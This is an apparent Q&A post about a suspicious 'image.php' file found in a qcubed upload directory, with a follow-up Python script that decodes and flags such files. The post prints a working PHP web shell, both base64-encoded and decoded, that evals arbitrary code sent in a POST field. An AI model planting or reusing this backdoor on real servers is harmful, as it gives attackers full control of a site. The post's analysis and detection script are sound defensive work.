What does eval on base64 encoded $_POST['e'] variable actually do?


Question

Ok so here's what I've googled:

It seems there is an uploaded file named "image.php" in a qcubed directory.

That image.php file contains the following base64 code:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

Which decodes to:

if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Searching for the output string I found similar qcubed vulnerabilities on other sites.

Decoding the last echoed string I got:

196.231-172.28:ifacermpubmice:afac42eri02

I really don't understand what it does (decoded using: http://ostermiller.org/calc/encode.html).

Can you please explain to me what in particular I'm facing here? What security vulnerability should I address in order to fix this?

Answer

The script will execute any PHP code it gets from the e POST variable, which is of course a horrible, extremely dangerous vulnerability.

The echo statement might be a confirmation for the attacking script that the correct version is installed, or something similar.

However, this is only dangerous if the image.php file can actually be executed in that directory. It's hard to give advice on what to do without knowing how the file got there in the first place.
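As an added illustration (this is not part of the question or the answer above, and not qcubed code): a small Python triage script that does by hand what the asker did with an online decoder. It unwraps eval(base64_decode('...')) layers, looks for an eval fed from a request parameter (the actual backdoor, whatever the parameter is called), and decodes the hex string in the echo, which in this family of droppers acts as a marker the operator can grep for. The sample file contents are constructed for the example from the blob quoted in the question; the surrounding `<?php eval(base64_decode('...')); ?>` wrapper is an assumption, since the question shows only the blob itself.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Constructed sample: the base64 blob quoted in the question, wrapped in the
# eval(base64_decode(...)) stub such droppers usually use. The wrapper is an
# assumption; the question only shows the blob.
SAMPLE_IMAGE_PHP = (
    "<?php eval(base64_decode('"
    "aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw=="
    "')); ?>"
)

# A base64 string literal handed straight to eval(base64_decode(...)).
B64_EVAL_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# eval over a request variable, optionally base64-wrapped: the backdoor itself.
REQUEST_EVAL_RE = re.compile(
    r"eval\s*\(\s*(?:base64_decode\s*\(\s*)?"
    r"\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]",
    re.IGNORECASE,
)
# echo of a hex-only string literal, used as a version/identity marker.
HEX_ECHO_RE = re.compile(r"echo\s*['\"]([0-9a-fA-F]{8,})['\"]", re.IGNORECASE)


def peel_base64_layers(src: str, max_depth: int = 8) -> List[str]:
    """Return src followed by every eval(base64_decode('...')) layer found in
    it, decoded and unwrapped recursively (outermost first). Nested wrapping
    is common, so each decoded layer is scanned again up to max_depth."""
    layers = [src]
    frontier = [src]
    for _ in range(max_depth):
        new = []
        for text in frontier:
            for m in B64_EVAL_RE.finditer(text):
                blob = re.sub(r"\s+", "", m.group(1))
                try:
                    decoded = base64.b64decode(blob).decode("utf-8", "replace")
                except (binascii.Error, ValueError):
                    continue  # not really base64; leave the layer as-is
                new.append(decoded)
        if not new:
            break
        layers.extend(new)
        frontier = new
    return layers


def decode_hex_marker(php: str) -> Optional[str]:
    """Decode the first echo '<hex>' literal in php, or None if there is none."""
    m = HEX_ECHO_RE.search(php)
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(1)).decode("utf-8", "replace")
    except ValueError:
        return None


def triage(src: str) -> dict:
    """Summarise a suspect PHP file: number of base64 layers, innermost code,
    which request parameter (if any) is passed to eval, and the echo marker."""
    layers = peel_base64_layers(src)
    request_eval: Optional[Tuple[str, str]] = None
    marker: Optional[str] = None
    for layer in layers:
        if request_eval is None:
            m = REQUEST_EVAL_RE.search(layer)
            if m:
                request_eval = (m.group(1).upper(), m.group(2))
        if marker is None:
            marker = decode_hex_marker(layer)
    return {
        "layers": len(layers),
        "decoded": layers[-1],
        "request_eval": request_eval,  # ('POST', 'e') for the sample above
        "marker": marker,
        "is_webshell": request_eval is not None,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_IMAGE_PHP)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run on the sample, the script reports two layers, an eval fed from $_POST['e'], and the marker 196.231-172.28:ifacermpubmice:afac42eri02, i.e. exactly what the question found by hand. The same triage function can be pointed at every .php file under an upload directory to find siblings of the dropper; finding the upload path that put the file there, and denying script execution in directories that are meant to hold user uploads, is what the answer's "how the file got there" question is driving at.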

